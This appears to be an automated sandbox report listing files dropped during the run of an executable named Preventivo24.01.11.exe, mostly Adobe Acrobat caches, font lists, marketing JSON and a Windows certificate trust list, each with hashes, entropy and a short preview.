SSDEEP:	6:HMWpPv8LzIq2P92nKuAl9OmbzNMxIFUt8+MWpPv8LxcZmw++MWpPv8LRkwO92nKA:H5PRv4HAa8jFUt8+5PD/++5Pa5LHAa8E
MD5:	7C5A8F20BB8DA645BF358F25B274AC89
SHA1:	EF7B48A9819B19722DAC73F2F9C8D3E5FC9BD1B0
SHA-256:	451B138632FFE7676FBB294B2325BF0DDE423F9A8DF1DC0791D94914A72A6CC2
SHA-512:	44F7EAE15BC19D4ED5D4DBDE12F47894C377F8611C1D8A30AE8230E97F8D3D99A860085A011F457132C7C23AD72784545BAF26511EE6283240BEC1C37592F0FA
Malicious:	false
Preview:	2024/01/23-12:08:03.366 1ca4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/01/23-12:08:03.367 1ca4 Recovering log #3.2024/01/23-12:08:03.368 1ca4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	66791
Entropy (8bit):	7.995531727155867
Encrypted:	true
SSDEEP:	1536:drFvD2YSE/sFDqV0FJJynkAhftCvMd3coa282frgW1qgNzU:drVDJSeaDqV0FJwLhVkr282fF5U
MD5:	AC05D27423A85ADC1622C714F2CB6184
SHA1:	B0FE2B1ABDDB97837EA0195BE70AB2FF14D43198
SHA-256:	C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
SHA-512:	6D0EF9050E41FBAE680E0E59DD0F90B6AC7FEA5579EF5708B69D5DA33A0ECE7E8B16574B58B17B64A34CC34A4FFC22B4A62C1ECE61F36C4A11A0665E0536B90D
Malicious:	false
Preview:	MSCF............,...................I.................gW.e .authroot.stl..u/1.5..CK..<Tk...p.k:..c.Y:.(Qc...%Y.f_...$..DHn..6i/.]....-!QQ..}f..f...}..1....9.......pN..mI.a.....!...N.....xP.f6..C.'#.c.@GN(3.<3.......9...('3...l.l....B..x..e...UWFU.TT.l.L...._.l1......w.\..Xb.v..Q......pKP.....M`.Y......Op4=.(=P.e...p.(U.....z7MF..O......V2.....#...pj...z.!...wQ...V&.Gz..Nv.4..y(J...A..':.2Q.^u.y..<.1..2..o........H.D.S.....62.\| w(...B.......h.QZ..'....l.<....6..Z...p?... .pT.......l..S..K....FT?.....p..`.&..y..."T=l.n..egf.w..X.Y...G.m....=.}cO.7.....9....o..:.Y=.-.5....ud.J&.]..Q..._<.S....{a.=.n...PT.Um).\| kpyA....h.PXY.>.......^2U...H.....V<\...k..~....H..p...8..'..?...r>.4..!u......1\.`.<.+..n..p..]...).....L.g....#.<..c]R.U."\i.Z.>...`Q..g6....0.......F.........N.s.Z..A........m.^....a_..>v.-.mk...wt.n.:...>S..;....1...j.+m.&S......$.T...i.B=h.n...c.!e.....Y.#..bw.}...d.. ..w... .&..w.9..}k...\...=....{q.Up..y;..7.-.K.'.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.1225101819215353
Encrypted:	false
SSDEEP:	6:kKg+surN+SkQlPlEGYRMY9z+4KlDA3RUeWc3l0:wPkPlE99SNxAhUeWcC
MD5:	8DA608E38CD892D8802B475530D44D0B
SHA1:	4D20F80E07DD54ECDFFB71F2668069B62FAD43D5
SHA-256:	9489DF9CAD710C1F81F812EC5FC89658F882CCF86A44D1F5AF7ABE060BF37B72
SHA-512:	60A4CBE114F2E0FC8D6AA9FD3A7EBEE6E0922375D446205EEFE817CFF492F60F0A8AE2F2A8A370351DEF7FBE89C4554CA13EC9C7E2583BD5FC71195602B2534B
Malicious:	false
Preview:	p...... ........)..i.M..(....................................................... ..........H"......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".3.f.e.4.e.6.1.a.4.8.2.2.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6304

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6304

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.354017538014257
Encrypted:	false
SSDEEP:	6:YEQXJ2HXmAHecSnw2cE47+FIbRI6XVW7+0Yu0ieoAvJM3g98kUwPeUkwRe9:YvXKXmiecSnw71yYpW7uOGMbLUkee9
MD5:	9CE2DCEF4DFE5C59F22BFEED6701D116
SHA1:	52A295C083EB06A0176A32AE5B0E10584F21C6A3
SHA-256:	B4E2FFF1C6441BD8B18ACFFAEC5A59C7DFA58355493EF6FE9E50BDBE6BBBD6EA
SHA-512:	6B62876EE36BB63DC2CCF7E95404E56CE0F718319AF51B714DE5619F2A3DD1E4E3EEF6E79A6D4FD59E093AE8E39A4A8ECD5E605DFAD2D564109C93CEA353BCC1
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.2913266747954575
Encrypted:	false
SSDEEP:	6:YEQXJ2HXmAHecSnw2cE47+FIbRI6XVW7+0Yu0ieoAvJfBoTfXpnrPeUkwRe9:YvXKXmiecSnw71yYpW7uOGWTfXcUkee9
MD5:	8CF741CF885B469DA1FD5CCC48433FF4
SHA1:	3705D62DADA7B7686E7085581BDBFC6BC0DBE98F
SHA-256:	1600B136CD9610CEAE6C1C6A02A7617D5CBEA6F350BEC2D9B34200CD9C8E4D91
SHA-512:	6C8E71AB0622D62531694C9926E93D08ED49E70EF4CE00DB7EECCCCFF2501E8EC0EA1C40A480A9B7F2E74F4A2E888C84CABD77B0A9ADBA3721D811C5C0EC32A3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.270032889022336
Encrypted:	false
SSDEEP:	6:YEQXJ2HXmAHecSnw2cE47+FIbRI6XVW7+0Yu0ieoAvJfBD2G6UpnrPeUkwRe9:YvXKXmiecSnw71yYpW7uOGR22cUkee9
MD5:	A5A95FC0005F4DD704E36FE159112383
SHA1:	4F7B0F5437168F34EB5DB859AF50FCE6438A94E7
SHA-256:	2E6D99275023C01D2BDB3CAA05739495175BDE13C6CDD82FFA18AAEB1CC22E15
SHA-512:	E07CD3A97BC8A7A6A3C6DF84FBAC5E6969A1F71B99A04DAAED27E1875F090EF74DE322824DC6E80B747DD06B31A04438FDFD8F94B9F83DD8F53B57E8B698368E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.3325824911663355
Encrypted:	false
SSDEEP:	6:YEQXJ2HXmAHecSnw2cE47+FIbRI6XVW7+0Yu0ieoAvJfPmwrPeUkwRe9:YvXKXmiecSnw71yYpW7uOGH56Ukee9
MD5:	CBAE69CEEED9975306682560961231BB
SHA1:	34163C96359C3283F03303623034E9423059F2FF
SHA-256:	D6A7C599DC0A1E91535D98CEC5D3ADBC1A1AD9F6912C208D5B94C16BDC6EEA3B
SHA-512:	54627AAF9237DB17A45DEC18FC249B7F6A5D4AAE4012E614955CE9DA83F478119705E791B73411B6A0E9FC81E20F4FE923242461C0F44A0E538B4A46B3F9992C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1255
Entropy (8bit):	5.6861636613403235
Encrypted:	false
SSDEEP:	24:Yv6Xle/w71Xiu7pLgEsv4ce3KnctSrymTBcu14wChluBks8ctq3H6D:Yv//du7hgnvjRrNTB5OJhABks8c2H4
MD5:	3E058A457B793C6E6B5476D53F21497C
SHA1:	EBD3E9CF29C1541215A16B96C9B16C626BE9217F
SHA-256:	F4E08EBDF85C41494C10A714A9B75F914B62325493FABDD289D59BEB6EA07D8F
SHA-512:	1314D12C41F9C9229CBCB73DABCB47A379CD40832D5B19295B155B6980883BB6C87371198EA6EB389ECFC5C2E079ECF8E5257FB0BD0A1552079BABD74F1B2B36
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_0","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"f7fa0e9f-7d25-4321-b719-c501bbb8a162","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0IGZpbGVzIHRvIGFuZCBmcm9tIFBERiBcbndpdGhvdXQgbGltaXRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5k

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	5.6949843654749435
Encrypted:	false
SSDEEP:	24:Yv6Xle/w71Xiu3VLgEsy4c19ZrGmTBcu14wCh5rgos8ctq3H6D:Yv//du3Fgnyl9ZrBTB5OJhFgos8c2H4
MD5:	BF4222D00C9E5572B3B51A677B4DD15B
SHA1:	11DBF715244F1A692BFDDB668C373C47B33AD3AD
SHA-256:	3C341A22D1257F694D9C28DD128019DF7EAFBC2B4A713E56B86E1FA51B0C14A0
SHA-512:	B814CD2CEA1EC58AF743FA545F9BF842A496CF5D3316DDB8CEEEAFA7D7EE15E499C1C3FB416B62C5A9630ED9A650C180DF692D6172ABAEA1623A4BF75F4D1CE8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_1","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"250f56c6-2d66-4fca-8033-eabbd2bc9951","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0LCBlZGl0IGFuZCBlLXNpZ24gUERGXG4gZm9ybXMgJiBhZ3JlZW1lbnRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2Nvb

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.279693631771721
Encrypted:	false
SSDEEP:	6:YEQXJ2HXmAHecSnw2cE47+FIbRI6XVW7+0Yu0ieoAvJfQ1rPeUkwRe9:YvXKXmiecSnw71yYpW7uOGY16Ukee9
MD5:	1F9FF8A22C56E5CD740F1EEF139574E1
SHA1:	2F60B88983B24012B7AA1E20A0CD08D510FB8D51
SHA-256:	DBECB494E59B69C79F6E90236AA475068B2F8BDBD7C6940A84A888FB6BCE35C1
SHA-512:	79FB75C66D7AF65FE8E4819E321738F6977B6869DC7F552D05826D2E60CB7C83267C9CAB65C276F6A4B7CB2EA141300685FE485B6EC27F52E1DB070786056B0D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1230
Entropy (8bit):	5.679763790060637
Encrypted:	false
SSDEEP:	24:Yv6Xle/w71Xium2LgEsk4ccVrhmTBcu14wChds8ctq3H6D:Yv//dumognkMVrYTB5OJhds8c2H4
MD5:	FA6E5CDFA7AF72ADA86264826E9DCB2E
SHA1:	32789D7EAF78C258291E57AF1483DA1BB36E1003
SHA-256:	6AB13D55BB644F83E54DBB773F16C792F370FDAE3B78C9681E1D6652B72002F1
SHA-512:	B8572989BE431C93D5A8CB84907175A99995291EB1659EC4AF8F59EEA3AE0C41CF83DEB2D855758E7A01BA37C5DB9E379BB4F133B46393F49D1852D342791960
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_3","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"07caa165-20a7-4c5f-adf8-061ef3d98af3","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2NvbG9yX2RhcmtfdGhlbWUiO

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1368
Entropy (8bit):	5.746299273767377
Encrypted:	false
SSDEEP:	24:Yv6Xle/w71XiuKKLgEGcooZbq0jCaBrwJoZct5uWaHbX3H6D:Yv//duKEgNoNtlSJEc3uWaHbHH4
MD5:	73D6AEBF99B9D81E86BC56665C777D67
SHA1:	71D017145FB1EABC13537333A137AA2AF52C5016
SHA-256:	DB3E1F74CB2230F6077CB5BCB6E09AF113AAD652F571C3A92BD8B0F8140C0089
SHA-512:	82227A443D46AE7E050C917FB1A9BA5D66F63C6C0115FFC4D0C54E4929BCBF974E4059CE60BA62CBF9219EE2BCB085E31CA1B1884709C0AB903C73002396F6F4
Malicious:	false
